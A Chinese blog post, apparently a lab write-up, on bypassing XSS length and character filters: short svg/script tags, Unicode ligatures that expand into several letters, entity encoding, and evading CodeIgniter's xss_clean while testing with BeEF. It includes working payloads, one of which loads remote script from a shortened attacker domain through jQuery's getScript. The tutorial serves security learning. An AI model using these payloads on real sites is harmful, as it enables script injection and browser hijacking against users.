当前位置:网站首页>限制字符绕过
限制字符绕过
2022-07-31 00:00:00 【Miracle_ze】
字符短域名绕过
一、绕过方法
1.1 重写,使用短标签
<svg/onload = ‘’ >
<script/ src = ’ ’ >
1.2 Unicode中多字符表示单字符
以下特殊字符会被html识别为单个字符
- ff expands to
ff- ℠ expands to
sm- ㏛ expands to
sr- st expands to
st- ㎭ expands to
rad- ℡ expands to
tel
1.3 实体编码html
二、限制长度短字符短域名绕过
2.1 xss_clean 过滤语句
使用beef工具开始尝试xss注入,首先使用基础语句实现弹窗<script>alert(1)</script>
添加结果:
由上图可见 被xss_clean过滤了注入失败。
为此我们删除xss_clean 来测试是否因为它而被过滤
结果表示xss_clean造成被过滤原因就是xss_clean
值得注意的是在当前xss_clean版本忽略了svg,为此我们可以使用svg注入
再次刷新页面同样显示
2.2
在观察前端引用文件时发现使用了jQuery
因此可以使用<svg/onload=$.getScript(‘℡㏛.co’)>注入,使用老师的telsr.co的域,是缩短了的即为5个字符。但是这个网站是老师提供的外网,我没有vpn因此选择了自己的。因此修改里字符限制长度
成功获取获取,在beef查看。
beef获取成功成功绕过。
三、kali的beef安装
边栏推荐
- VSCode高效开源神器有哪些
- uniapp folding box secondary loop
- transition过渡&&animation动画
- $\text{ARC 145}$
- HF2022-EzPHP reproduction
- How to Repair Word File Corruption
- Summary of the stock problem of state machine dynamic programming
- 2021GDCPC Guangdong University Student Programming Competition H.History
- 2022 Nioke Summer Multi-School Training Camp 1 J Serval and Essay
- Bugku sql注入
猜你喜欢
随机推荐
边缘计算与小程序也能结合!智能家居是否能借势上台阶
Summary of BFS questions
mysql中关于存储过程无法实现迁移复制表中数据问题
Unity 加载读取PPT
(WebFlux)001、如何自定义注解实现功能
Ukraine's foreign ministry: wu was restored to complete the export of food security
智能创意中的尺寸拓展模块
数据清洗-使用es的ingest
"Wei cup" school more than 2022 cattle summer camp 4 L.B lack Hole, computational geometry
joiplay模拟器报错如何解决
2D转换模块&&媒体查询
How to install joiplay emulator rtp
45.【list链表的应用】
ZZULIOJ: 1120: the most value to exchange
joiplay模拟器如何调中文
C# VSCode & Rider引用命名空间快捷键
PyTorch model export to ONNX file example (LeNet-5)
Android security optimization - APP reinforcement
Reverse linked list - head insertion inversion method
在微服务中使用事件溯源的六大原因 - Herath